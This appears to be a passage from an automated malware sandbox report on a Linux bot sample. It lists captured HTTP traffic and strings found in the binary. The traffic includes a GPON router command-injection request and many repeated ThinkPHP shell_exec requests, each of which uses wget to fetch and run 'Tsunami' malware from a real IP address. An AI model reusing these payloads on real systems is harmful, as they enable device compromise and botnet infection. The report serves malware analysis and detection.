    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1007Date: Sat, 14 May 2022 00:21:33 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 36 38 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:21:36 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:22:37 GMTServer: Apache/2.4.7 (Ubuntu)Content-Length: 281Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://103.136.43.52/bin
    Source: pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://103.136.43.52/bins/Tsunami.mips;
    Source: pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://103.136.43.52/bins/Tsunami.x86
    Source: pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://103.136.43.52/zyxel.sh;
    Source: pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
    Source: pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
    Source: pjT3uuMrF1String found in binary or memory: http://upx.sf.net
    Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
